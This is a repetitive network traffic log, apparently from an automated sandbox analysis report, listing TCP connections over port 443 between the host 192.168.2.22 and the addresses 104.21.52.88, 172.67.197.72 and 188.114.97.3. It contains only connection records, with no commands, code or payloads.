                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
